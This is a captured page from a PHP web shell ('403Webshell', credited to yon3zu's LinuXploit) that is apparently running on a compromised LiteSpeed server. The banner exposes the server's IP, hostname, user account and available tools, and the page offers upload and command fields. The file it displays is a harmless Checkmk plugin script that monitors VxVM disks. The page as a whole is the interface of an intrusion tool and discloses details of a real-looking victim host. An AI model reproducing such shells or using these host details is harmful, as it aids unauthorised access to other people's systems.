403Webshell
Server IP : 162.19.112.25  /  Your IP : 216.73.216.88
Web Server : LiteSpeed
System : Linux qamar.tasjeel.ae 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
User : archiart ( 1428)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/root/usr/lib/check_mk_agent/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/self/root/usr/lib/check_mk_agent/plugins/vxvm
#!/bin/sh
# Copyright (C) 2019 Checkmk GmbH - License: GNU General Public License v2
# This file is part of Checkmk (https://checkmk.com). It is subject to the terms and
# conditions defined in the file COPYING, which is part of this source code package.

# Reason for this no-op: shellcheck disable=... before the first command disables the error for the
# entire script.
:

# Disable unused variable error (needed to keep track of version)
# shellcheck disable=SC2034
CMK_VERSION="2.3.0p38"

# This plugin has been tested on Linux and HPUX.

if type vxdmpadm >/dev/null 2>&1; then
    echo '<<<vxvm_enclosures>>>'
    vxdmpadm listenclosure all | grep -v -w -e "^[dD]isk" -e "^other_disks" -e "^ENCLR_NAME" -e "\^="
    echo '<<<vxvm_multipath>>>'
    ENCS=$(vxdmpadm listenclosure all | grep -v -w -e "^[dD]isk" -e "ENCLR_NAME" -e "\^=" | awk '{print $1}')

    echo "$ENCS" | while read -r enc; do
        vxdmpadm getdmpnode enclosure="${enc}" | grep -v -e "\^=" -e NAME
    done
fi

if type vxdg >/dev/null 2>&1; then
    echo '<<<vxvm_objstatus>>>'
    # Get a list of the in-use disk groups.
    DGS=$(vxdg list | grep "enabled" | awk '{print $1}')
    # Deported or otherwise inactive needs no performance monitoring
    if [ "X${DGS}" != "X" ]; then
        for DG in $DGS; do
            vxprint -g "${DG}" -v -q -Q -F "%type %dgname %name %admin_state %kstate"
        done
    fi
fi

Youez - 2016 - github.com/yon3zu
LinuXploit